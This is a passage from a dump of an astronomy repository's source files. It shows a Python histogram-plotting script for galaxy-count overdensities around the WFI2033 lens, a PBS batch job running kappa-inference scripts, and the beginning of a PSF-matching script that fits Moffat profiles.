10]\n\nplt.subplot(459)\nrangemax=7\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(459)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{M^3_{rms}}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 8\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=17\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(4,5,11)\nrangemax=4\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(4,5,11)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{z}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 9\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=19\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(4,5,12)\nrangemax=7\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(4,5,12)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{M}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 10\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=21\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(4,5,13)\nrangemax=6\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(4,5,13)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{M^2}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 11\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=23\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(4,5,14)\nrangemax=6\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(4,5,14)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{M^3}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 12\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=25\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nx = linspace(0,3,500)\n\n\ngauss_q_W4_50 = gaussian_kde(q_W4_50)\n\ngauss_q_W4_75 = gaussian_kde(q_W4_75)\n\nplt.subplot(4,5,16)\nrangemax=8\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n#plt.plot(x,gauss_q_W1_50(x),'b', linewidth=0.5)\nax=plt.subplot(4,5,16)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'${\\zeta_\\frac{M_{rms}^2}{r}}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 13\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=27\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nx = linspace(0,3,500)\n\n\ngauss_q_W4_50 = gaussian_kde(q_W4_50)\n\ngauss_q_W4_75 = gaussian_kde(q_W4_75)\n\nplt.subplot(4,5,17)\nrangemax=8\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(4,5,17)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'${\\zeta_\\frac{M_{rms}^3}{r}}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 14\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=29\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(4,5,18)\nrangemax=7\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(4,5,18)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{zM}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 15\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=31\n\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\n\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(4,5,19)\nrangemax=10\n\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(4,5,19)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{zM^2}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6, direction='up')\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 16\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\nplt.legend(bbox_to_anchor=(1.5, 4), loc='center left', borderaxespad=0., fontsize=10)\n\n#plt.subplots_adjust(top=0.6)\n\nplt.tight_layout()\n\nplt.savefig('%s_overdensities_%s_size%s_i%s_%s.png' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])), dpi=1000)\n\n#plt.show()\n\nos.system(\"rm fieldshistW4_50_%s_%s_size%s_i%s_%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])))\nos.system(\"rm fieldshistW4_75_%s_%s_size%s_i%s_%s.lst\" % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]),str(sys.argv[6])))\n\nif str(sys.argv[2]) == \"samp\":\n print(\" --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.6843910813331604, "alphanum_fraction": 0.7821612358093262, "avg_line_length": 28.149999618530273, "blob_id": "d336afd373626acad87153b0af028e5e0cbdfe3a", "content_id": "270e35494647106aef01e6e5623dfd405ca76a4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 583, "license_type": "no_license", "max_line_length": 86, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim15.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log15s.out\n#PBS -e Log15s.err\n#PBS -N 15s\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappasimbias.py WFI2033 5 45 23 meds gal gamma oneoverr mass3overrrms\npython inferkappasimbias.py WFI2033 5 120 23 meds gal gamma oneoverr mass3overrrms\npython inferkappasimbiasphil.py WFI2033 5 45 23 meds gal gamma oneoverr mass3overrrms\npython inferkappasimbiasphil.py WFI2033 5 120 23 meds gal gamma oneoverr mass3overrrms\n" }, { "alpha_fraction": 0.6311819553375244, "alphanum_fraction": 0.662213146686554, "avg_line_length": 26.05539321899414, "blob_id": "b358be17ef15c90f0610b0953486a828e3368537", "content_id": "4ede25a38668bdb19e2d284343adcc8d73e659af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9281, "license_type": "no_license", "max_line_length": 143, "num_lines": 343, "path": "/python/image_utilities/py_mk-kernels.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Code from Adam Tomczak, used to create kernels in order to broaden a narrow PSF in order to match a broader one. Approximates the PSF analytically.\n# The actual convolution of images using the kernel is done by the convolution.py code.\n\nimport pylab\nfrom scipy import signal\nfrom scipy import ndimage\nfrom scipy import optimize\nfrom astropy.io import fits\nfrom astropy import modeling\nfrom skimage import restoration\nfrom photutils import CircularAperture\nfrom photutils import aperture_photometry\n\nmoffat2d = modeling.functional_models.Moffat2D()\n\nclass MoffatTomczak2D(modeling.Fittable2DModel):\n amplitude = modeling.Parameter(default=1)\n x_0 = modeling.Parameter(default=0)\n y_0 = modeling.Parameter(default=0)\n scale = modeling.Parameter(default=1)\n rotation = modeling.Parameter(default=0)\n gamma = modeling.Parameter(default=1)\n alpha = modeling.Parameter(default=1)\n\n @staticmethod\n def evaluate(x, y, amplitude, x_0, y_0, scale, rotation, gamma, alpha):\n\t\trr_gg = (((x - x_0)*scale) ** 2 + (y - y_0) ** 2) / gamma ** 2\n\t\trr_gg_alpha = amplitude * (1 + rr_gg) ** (-alpha)\n\t\trr_gg_alpha_rotate = ndimage.rotate(rr_gg_alpha, rotation, reshape=0)\n\t\treturn rr_gg_alpha_rotate\n\nmoffatTomczak = MoffatTomczak2D()\n\nmodel_fitter = modeling.fitting.LevMarLSQFitter()\n\nlens_name = 'WFI2033'\n\n#imnames = ['u', 'i']\n\n#psfs = [fits.getdata('u_psfnorm.fits'),\n#\t\tfits.getdata('g_psfnorm.fits')]\n\nimnames = ['r', 'ch1']\n\npsfs = [fits.getdata('modifiedforTPHOT/ir_PSFfix.fits'),\n fits.getdata('ch1/ch1psffix_oversampled.fits')]\n\n\n\ncogs = []\ncogs_moffs = []\nfwhms = []\nfluxtot = pylab.array([])\nprofiles = []\nmoffat_psfs = []\nmoffatTomczak_psfs = []\n\nbgs = pylab.array([])\nscatters = pylab.array([])\n\ncogs_conv = []\nfwhms_conv = []\n\ndy, dx = psfs[0].shape\ny0, x0 = dy/2, dx/2\n\npx_scale = 0.2018\nradii = pylab.linspace(0.5, dx/2-1, 20)\napers = [CircularAperture([x0, y0], r=ri) for ri in radii]\n\n\n\nfig = pylab.figure(figsize=(12.4, 12.9))\nsp2 = fig.add_subplot(222)\nsp1 = fig.add_subplot(221)\nsp4 = fig.add_subplot(224)\nsp3 = fig.add_subplot(223)\n\nsp1.minorticks_on()\nsp2.minorticks_on()\nsp3.minorticks_on()\nsp4.minorticks_on()\n\nsp1.grid()\nsp2.grid()\nsp3.grid()\nsp4.grid()\n\nsp1.set_xlabel('radius [\"]')\nsp2.set_xlabel('radius [\"]')\t\nsp3.set_xlabel('radius [\"]')\nsp4.set_xlabel('radius [\"]')\n\nsp1.set_ylabel('Flux(r)')\nsp3.set_ylabel('$\\Sigma$ Flux(< r) / model')\n\n#sp3.axhline(1, color='k', lw=1.5, ls='--')\n#sp4.axhline(1, color='k', lw=1.5, ls='--')\n\nfig.subplots_adjust(wspace=0)\n\n\nfor i in range(len(psfs)):\n\n\tpsf = psfs[i]\n\n\n\t### Estimating FWHM\n\txx, yy = pylab.meshgrid(range(-dx/2+1, dx/2+1), range(-dx/2+1, dx/2+1))\n\trr = (xx**2 + yy**2)**0.5\n\tr_uniq = pylab.unique(rr)\n\tprofile = pylab.array([])\n\tfor ri in r_uniq:\n\t\trinds = pylab.where(rr == ri)\n\t\tprofile = pylab.append(profile, pylab.mean(psf[rinds]))\n\tfwhm = 2 * pylab.interp(profile.max()/2., profile[::-1], r_uniq[::-1])\n\n\n\t### Estimating background, noise, and total flux of psf\n\tinds_outer = pylab.where(rr > 2*fwhm)\n\tbg = pylab.median(psf[inds_outer])\n\tscatter = pylab.std(psf[inds_outer])\n\tbgs = pylab.append(bgs, bg)\n\tscatters = pylab.append(scatters, scatter)\n\tinds_seg = pylab.where(psf > bg + 2*scatter)\n\tinds_nonseg = pylab.where(psf <= bg + 2*scatter)\n\n#\tpsf -= bg\n\taper_tot = CircularAperture([x0, y0], r=4./0.2)\n\tphot_tot = aperture_photometry(psf, aper_tot)\n\tfluxtot = pylab.append(fluxtot, phot_tot['aperture_sum'])\n\tpsf /= fluxtot[-1]\n\n\n\t### Re-estimating FWHM from bg-subtracted psf\n\trr = (xx**2 + yy**2)**0.5\n\tr_uniq = pylab.unique(rr)\n\tprofile = pylab.array([])\n\tfor ri in r_uniq:\n\t\trinds = pylab.where(rr == ri)\n\t\tprofile = pylab.append(profile, pylab.mean(psf[rinds]))\n\tfwhm = 2 * pylab.interp(profile.max()/2., profile[::-1], r_uniq[::-1])\n\tfwhms.append(fwhm)\n\n\n\t### Fitting a moffat profile\n\tfit = model_fitter(moffat2d, xx, yy, psf)\n\tfits.writeto('moffat_' + imnames[i] + '.fits', fit(xx, yy), clobber=1)\n\tfits.writeto('resid_' + imnames[i] + '-moffat.fits', psf-fit(xx, yy), clobber=1)\n\n\t### Fitting a moffat+tomczak profile\n\tfit2 = model_fitter(moffatTomczak, xx, yy, psf)\n\tfits.writeto('moffatTomczak_' + imnames[i] + '.fits', fit2(xx, yy), clobber=1)\n\tfits.writeto('resid_' + imnames[i] + '-moffatTomczak.fits', psf-fit2(xx, yy), clobber=1)\n\n\tmoffat_psfs.append(fit(xx, yy))\n\tmoffatTomczak_psfs.append(fit(xx, yy))\n\n\n\n\t### Plotting profiles\n\tcolor = pylab.cm.jet(i * 1. / (len(psfs) - 1))\n\tsp1.plot(r_uniq * px_scale, profile / profile.max(), color=color, lw=3, label=imnames[i] + ' %.2f' % (fwhm * px_scale) + '\"')\n\tprofiles.append(profile / profile.max())\n\n\tsp2.axhline(10, color=color, label=imnames[i] + ' %.2f' % (fwhm * px_scale) + '\"')\n\n\n\t### Measuring curve of growth\n\tcog = pylab.array([])\n\tcog_moff = pylab.array([])\n\tfor aper in apers:\n\t\tphot = aperture_photometry(psf, aper)\n\t\tphot_moff = aperture_photometry(fit(xx, yy), aper)\n\t\tcog = pylab.append(cog, 